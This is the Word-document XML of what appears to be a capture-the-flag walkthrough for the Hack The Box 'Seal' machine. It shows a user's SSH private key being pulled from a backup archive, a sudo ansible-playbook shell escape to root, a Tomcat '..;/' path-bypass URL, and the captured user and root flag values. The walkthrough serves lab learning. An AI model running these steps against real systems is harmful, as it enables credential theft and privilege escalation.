      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00636C68">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00636C68">
        <w:t>/ uploads/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002051E1" w:rsidRDefault="002051E1" w:rsidP="002051E1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tomcat@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/lib/tomcat9/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webapps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ROOT/admin/dashboard$ cd /opt/backups/archives</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00636C68" w:rsidRDefault="002051E1" w:rsidP="002051E1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tomcat@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:/opt/backups/archives$ ls </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="002051E1" w:rsidRDefault="00276FF3" w:rsidP="002051E1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16C31C9A" wp14:editId="19E0B910">
            <wp:extent cx="5943600" cy="15722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F3" w:rsidRDefault="00114C38" w:rsidP="002051E1">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00114C38">
        <w:t>tomcat@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00114C38">
        <w:t xml:space="preserve">:/opt/backups/archives$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00114C38">
        <w:t>cp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00114C38">
        <w:t xml:space="preserve"> backup-2021-11-20-10\:35\:33.gz /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00114C38">
        <w:t>shm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00114C38">
        <w:t>/pentest.gz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00114C38" w:rsidRDefault="00114C38" w:rsidP="002051E1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B25255D" wp14:editId="4430267A">
            <wp:extent cx="5943600" cy="3625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B" w:rsidRDefault="0081191B" w:rsidP="0081191B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tomcat@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/opt/backups/archives$ cd /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00114C38" w:rsidRDefault="0081191B" w:rsidP="0081191B">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tomcat@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>kd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pentest.gz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0081191B" w:rsidRDefault="000D5CC1" w:rsidP="0081191B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6660B9EC" wp14:editId="39CF3AC3">
            <wp:extent cx="4095750" cy="561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C1" w:rsidRDefault="008A0964" w:rsidP="0081191B">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A0964">
        <w:t>tomcat@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A0964">
        <w:t>:/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A0964">
        <w:t>shm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008A0964">
        <w:t xml:space="preserve">$ file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008A0964">
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="008A0964" w:rsidRDefault="008A0964" w:rsidP="0081191B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78FB13EE" wp14:editId="39649918">
            <wp:extent cx="2800350" cy="361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59" w:rsidRDefault="002D093D" w:rsidP="0081191B">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D093D">
        <w:t>tomcat@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D093D">
        <w:t>:/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D093D">
        <w:t>shm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D093D">
        <w:t xml:space="preserve">$ tar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D093D">
        <w:t>xvf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002D093D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002D093D">
        <w:t>pentest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="002D093D" w:rsidRDefault="00775D85" w:rsidP="0081191B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43A3FEC4" wp14:editId="0C6A98E7">
            <wp:extent cx="4733925" cy="67913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85" w:rsidRDefault="00DB419A" w:rsidP="0081191B">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB419A">
        <w:t>tomcat@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB419A">
        <w:t>:/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB419A">
        <w:t>shm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DB419A">
        <w:t xml:space="preserve">$ ls </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DB419A">
        <w:t>lsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00DB419A" w:rsidRDefault="00DB419A" w:rsidP="0081191B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B5593C8" wp14:editId="27C80730">
            <wp:extent cx="5219700" cy="1895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03" w:rsidRDefault="00055D03" w:rsidP="00055D03">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tomcat@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>$ cd dashboard/uploads/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00DB419A" w:rsidRDefault="00055D03" w:rsidP="00055D03">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tomcat@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/dashboard/uploads/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">$ ls </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00055D03" w:rsidRDefault="00AE3A0A" w:rsidP="00055D03">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0221AAF3" wp14:editId="43DD1658">
            <wp:extent cx="4981575" cy="14763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0A" w:rsidRDefault="00CF33F5" w:rsidP="00055D03">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF33F5">
        <w:t>tomcat@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF33F5">
        <w:t>:/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF33F5">
        <w:t>shm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF33F5">
        <w:t>/dashboard/uploads/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF33F5">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CF33F5">
        <w:t xml:space="preserve">$ cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CF33F5">
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CF33F5" w:rsidRDefault="004B4146" w:rsidP="00055D03">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B440B03" wp14:editId="2CF7963F">
            <wp:extent cx="5781675" cy="60293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46" w:rsidRDefault="00C90CC7" w:rsidP="00055D03">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6DA681B1" wp14:editId="62E4D4F2">
            <wp:extent cx="5943600" cy="5657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D3" w:rsidRDefault="003800D3" w:rsidP="003800D3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C90CC7" w:rsidRDefault="003800D3" w:rsidP="003800D3">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 600 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003800D3" w:rsidRDefault="003800D3" w:rsidP="003800D3">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="489F9AA8" wp14:editId="46C8B8C1">
            <wp:extent cx="3076575" cy="447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F7" w:rsidRDefault="00E718F7" w:rsidP="00E718F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800D3" w:rsidRDefault="00E718F7" w:rsidP="00E718F7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id_rsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId52" w:history="1">
        <w:r w:rsidRPr="000B6939">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>luis@seal.htb</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E718F7" w:rsidRDefault="00807623" w:rsidP="00E718F7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E46008C" wp14:editId="1A878839">
            <wp:extent cx="5943600" cy="32321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23" w:rsidRDefault="008F67CA" w:rsidP="00E718F7">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F67CA">
        <w:t>luis@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F67CA">
        <w:t xml:space="preserve">:~$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008F67CA">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008F67CA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="008F67CA">
        <w:t>l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F67CA" w:rsidRDefault="00BE7C50" w:rsidP="00E718F7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D28BBC9" wp14:editId="434C35F5">
            <wp:extent cx="5943600" cy="76073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F2" w:rsidRDefault="004D5527" w:rsidP="00194C07">
      <w:hyperlink r:id="rId55" w:history="1">
        <w:r w:rsidRPr="000B6939">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gtfobins.github.io/gtfobins/ansible-playbook/#sudo</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00194C07" w:rsidRDefault="00194C07" w:rsidP="00194C07">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>luis@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>$ TF=$(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mktemp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00194C07" w:rsidRDefault="00194C07" w:rsidP="00194C07">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>luis@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>$ echo '[{hosts: localhost, tasks: [shell: /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &lt;/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &gt;/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 2&gt;/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]}]' &gt;$TF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE7C50" w:rsidRDefault="00194C07" w:rsidP="00194C07">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>luis@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shm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ansible</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-playbook $TF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00194C07" w:rsidRDefault="00194C07" w:rsidP="00194C07"/>
    <w:p w:rsidR="000D7ADD" w:rsidRDefault="004D5527" w:rsidP="000D7ADD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="531AC985" wp14:editId="5F35B14A">
            <wp:extent cx="5943600" cy="1504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27" w:rsidRDefault="00CF5475" w:rsidP="000D7ADD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44FC03C7" wp14:editId="1FF67AC5">
            <wp:extent cx="3590925" cy="13335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475" w:rsidRDefault="00B3693D" w:rsidP="000D7ADD">
      <w:r>
        <w:t xml:space="preserve">Root.txt: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B3693D">
        <w:t>7752a46f8f9c58839e36676dbfff5eec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00743C6B" w:rsidRDefault="00F42A83" w:rsidP="009266E6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3627B0A5" wp14:editId="2D07C8D8">
            <wp:extent cx="4943475" cy="18859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83" w:rsidRDefault="00B07ED6" w:rsidP="009266E6">
      <w:r>
        <w:t xml:space="preserve">User.txt : </w:t>
      </w:r>
      <w:r w:rsidRPr="00B07ED6">
        <w:t>a93d48abd7d3c374bde1653fd33c31c5</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00F42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88F"/>
    <w:rsid w:val="00055D03"/>
    <w:rsid w:val="00084299"/>
    <w:rsid w:val="000B651A"/>
    <w:rsid w:val="000C59C2"/>
    <w:rsid w:val="000D5CC1"/>
    <w:rsid w:val="000D7ADD"/>
    <w:rsid w:val="000E3859"/>
    <w:rsid w:val="001034CB"/>
    <w:rsid w:val="00114C38"/>
    <w:rsid w:val="00127B67"/>
    <w:rsid w:val="00194C07"/>
    <w:rsid w:val="00194C16"/>
    <w:rsid w:val="001E77C8"/>
    <w:rsid w:val="001F6E93"/>
    <w:rsid w:val="002051E1"/>
    <w:rsid w:val="00205B32"/>
    <w:rsid w:val="00276FF3"/>
    <w:rsid w:val="00277DEF"/>
    <w:rsid w:val="0028667E"/>
    <w:rsid w:val="002D093D"/>
    <w:rsid w:val="002D4737"/>
    <w:rsid w:val="00322E89"/>
    <w:rsid w:val="003800D3"/>
    <w:rsid w:val="003918BF"/>
    <w:rsid w:val="003C3DBB"/>
    <w:rsid w:val="003D64E4"/>
    <w:rsid w:val="003F00A8"/>
    <w:rsid w:val="00457FE5"/>
    <w:rsid w:val="004611C5"/>
    <w:rsid w:val="0046253A"/>
    <w:rsid w:val="004B4146"/>
    <w:rsid w:val="004B6203"/>
    <w:rsid w:val="004D5527"/>
    <w:rsid w:val="00515E59"/>
    <w:rsid w:val="00542996"/>
    <w:rsid w:val="00573556"/>
    <w:rsid w:val="00624335"/>
    <w:rsid w:val="00636C68"/>
    <w:rsid w:val="00695E75"/>
    <w:rsid w:val="006B782F"/>
    <w:rsid w:val="006F3EF1"/>
    <w:rsid w:val="00704CF2"/>
    <w:rsid w:val="00705536"/>
    <w:rsid w:val="00720017"/>
    <w:rsid w:val="00743C6B"/>
    <w:rsid w:val="00772B66"/>
    <w:rsid w:val="00775D85"/>
    <w:rsid w:val="007B1961"/>
    <w:rsid w:val="007E5FDA"/>
    <w:rsid w:val="007E7BDC"/>
    <w:rsid w:val="007F088F"/>
    <w:rsid w:val="00807623"/>
    <w:rsid w:val="0081191B"/>
    <w:rsid w:val="00890123"/>
    <w:rsid w:val="008A0964"/>
    <w:rsid w:val="008C270A"/>
    <w:rsid w:val="008F57D7"/>
    <w:rsid w:val="008F67CA"/>
    <w:rsid w:val="009266E6"/>
    <w:rsid w:val="00933EC1"/>
    <w:rsid w:val="009839F2"/>
    <w:rsid w:val="00985D18"/>
    <w:rsid w:val="00A07D8E"/>
    <w:rsid w:val="00A2578E"/>
    <w:rsid w:val="00A37499"/>
    <w:rsid w:val="00A50010"/>
    <w:rsid w:val="00A7217F"/>
    <w:rsid w:val="00AC307E"/>
    <w:rsid w:val="00AC5ADC"/>
    <w:rsid w:val="00AE3A0A"/>
    <w:rsid w:val="00AE78A3"/>
    <w:rsid w:val="00AF6CB1"/>
    <w:rsid w:val="00B004F0"/>
    <w:rsid w:val="00B07ED6"/>
    <w:rsid w:val="00B12442"/>
    <w:rsid w:val="00B3693D"/>
    <w:rsid w:val="00B5141D"/>
    <w:rsid w:val="00BE7C50"/>
    <w:rsid w:val="00C30599"/>
    <w:rsid w:val="00C60CA7"/>
    <w:rsid w:val="00C85348"/>
    <w:rsid w:val="00C90CC7"/>
    <w:rsid w:val="00CB3D33"/>
    <w:rsid w:val="00CF33F5"/>
    <w:rsid w:val="00CF5475"/>
    <w:rsid w:val="00D13DBB"/>
    <w:rsid w:val="00D46234"/>
    <w:rsid w:val="00D500D1"/>
    <w:rsid w:val="00D51B5F"/>
    <w:rsid w:val="00D5462D"/>
    <w:rsid w:val="00D6581B"/>
    <w:rsid w:val="00DB419A"/>
    <w:rsid w:val="00DB5022"/>
    <w:rsid w:val="00DB6394"/>
    <w:rsid w:val="00DF025D"/>
    <w:rsid w:val="00E311A6"/>
    <w:rsid w:val="00E33C2E"/>
    <w:rsid w:val="00E62B2F"/>
    <w:rsid w:val="00E66CB1"/>
    <w:rsid w:val="00E718F7"/>
    <w:rsid w:val="00EF0CED"/>
    <w:rsid w:val="00EF59CA"/>
    <w:rsid w:val="00F42A83"/>
    <w:rsid w:val="00F53CE9"/>
    <w:rsid w:val="00F65FA9"/>
    <w:rsid w:val="00F70387"/>
    <w:rsid w:val="00F76E6A"/>
    <w:rsid w:val="00F95983"/>
    <w:rsid w:val="00FC3F16"/>
    <w:rsid w:val="00FD2AE4"/>
    <w:rsid w:val="00FE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1EC00"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B1F74F37-6B11-4630-8308-5ED3CA2E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001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85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s://seal.htb/manager/status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tfobins.github.io/gtfobins/ansible-playbook/#sudo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https://seal.htb/manager/status/..;/html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image" Target="media/image2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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://seal.htb:8080/" TargetMode="External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hyperlink" Target="http://seal.htb:8080/register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mailto:luis@seal.htb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21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198</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-20T05:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-11-20T11:01:00Z</dcterms:modified>
</cp:coreProperties>
</file>